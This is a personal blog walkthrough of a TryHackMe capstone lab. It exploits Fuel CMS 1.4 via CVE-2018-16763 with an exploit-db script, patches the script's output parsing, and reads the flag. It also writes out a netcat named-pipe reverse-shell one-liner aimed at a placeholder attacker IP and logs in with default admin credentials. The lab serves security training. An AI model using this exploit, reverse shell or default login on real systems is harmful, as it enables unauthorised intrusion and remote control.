TryHackMe: Vulnerability Capstone – Walkthrough

Let’s look at the Vulnerability Capstone Room on THM, in which we use skills learnt in the Vulnerability Research module by completing this capstone room

I am making these walkthroughs to keep myself motivated to learn cyber security, and ensure that I remember the knowledge gained by these challenges on HTB and THM.
Join me on learning cyber security. I will try and explain concepts as I go, to differentiate myself from other walkthroughs.

Box URL: https://tryhackme.com/r/room/vulnerabilitycapstone

Task 1: Introduction

Summarize the skills learnt in this module by completing this capstone room for the “Vulnerability Research” module.

Acme Support Incorporated has recently set up a new blog. Their developer team have asked for a security audit to be performed before they create and publish articles to the public.

It is your task to perform a security audit on the blog; looking for and abusing any vulnerabilities that you find.

Questions

Let’s get hacking

Answer: No answer needed

Task 2: Exploit the Machine (Flag Submission)

Deploy the vulnerable machine attached to this by pressing the green “Start Machine” button. It is recommended that you use the TryHackMe AttackBox to complete this room.

Allow five minutes to pass before attempting to attack the vulnerable machine MACHINE_IP

Questions

What is the name of the application running on the vulnerable machine?

Let’s get going. Start up your AttackBox or if you prefer connect to the target machine by using OpenVPN, using the following command:

sudo openvpn <file_name>.ovpn

To find out what we are looking at, start by running a simple nmap scan:

nmap <target ip>

This shows us a SSH service and a web server:

Considering the type of challenge, we should probably take a look at the webserver. Open the page in your favorite browser.

Well this is interesting! It seems to be a Content Management System, and the name is very visible.

Answer: Fuel CMS

What is the version number of this application?

This question is also very easy to answer now. The CMS is not properly setup yet, so it shows us the version number straight away.

Answer: 1.4

What is the number of the CVE that allows an attacker to remotely execute code on this application?

There are a lot of different ways to search for exploits. We could use searchsploit in the terminal.

searchsploit fuel cms 1.4

This gives us a bunch of exploits:

But I am not a big fan of this, as I always end up googling way. So let’s just search on google. We quickly find the following CVE: 2018–16763.

This is the one TryHackMe expects.

Answer: CVE-2018–16763

What is the value of the flag located on this vulnerable machine? This is located in /home/ubuntu on the vulnerable machine.

It’s time to exploit this vulnerability, by running the exploit.

Exploit-db has a useful page, including a script, on this vulnerability here:

Click the download button found on the page:

This will download the script to our machine.

Let’s try and run the script:

python3 50477.py

It gives us a message about needing a url. That makes sense:

Run it again, now followed by the target machine ip.

python3 50477.py -u <target ip>

This warned me about having to enter a valid URL. Let’s try again with http:// before the ip address:

python3 50477.py -u http://<target ip>

This worked:

We can now enter commands, which means we might have accomplished Remote Code Execution!

But darn it, now matter which command we enter we always get system back:

Something seems wrong with the exploit. I took a look with Burp Suite, intercepted the GET requests from the script and saw that indeed the commands are listed, just not in the correct html tag read by the text.split() function in the exploit script:

It was actually pretty close to the other HTML tag that contains system, so I decided to change the printing of the variable output[0] to output[1]. This means that the second array element that gets returned by text.split() now gets printed.
In essence, we now print the second (remember array indexes start at 0) div element with the correct style, instead of the first.

Save the script, and run again.

It worked:

In this theoretical CTF assignment we can continue by simple reading the flag which is found at /home/ubuntu (it says so in the questions).

So as a command you can simply enter:

ls /home/ubuntu

The flag is right there. Enter the following:

cat /home/ubuntu/flag.txt

There we go:

Answer: THM{ACKME_BLOG_HACKED}

That’s it 🙂

Reverse Shell

For extra points we could even get a reverse shell.

Start a listener on your attacker machine with:

nc -lvnp 1234

The enter the following command into the exploit:

rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc <attacker ip> <listener port>>/tmp/f

This gives us a reverse shell:

Bonus

The CMS has another vulnerability. Since the CMS is not properly setup we can login with the default credentials as mentioned here:

Follow the link and enter admin twice:

And we got in!

This probably allows for a lot of other possibilities 🙂

We are done!

Congratulations, we did it once again! I hope you enjoyed this walkthrough on the Vulnerability Capstone room on TryHackMe.

I really liked this room and it made us repeat some of the skills we picked up during the Vulnerability module. See you next time.

Like my articles?

You are welcome to comment on this article, and please share with friends!
I would be even more grateful if you support me by buying me a cup of coffee:

I learned a lot through HackTheBox’s Academy. If you want to sign up, you can get extra cubes, and support me in the process, if you use the following link:

https://referral.hackthebox.com/mzwwXlg

Happy Hacking!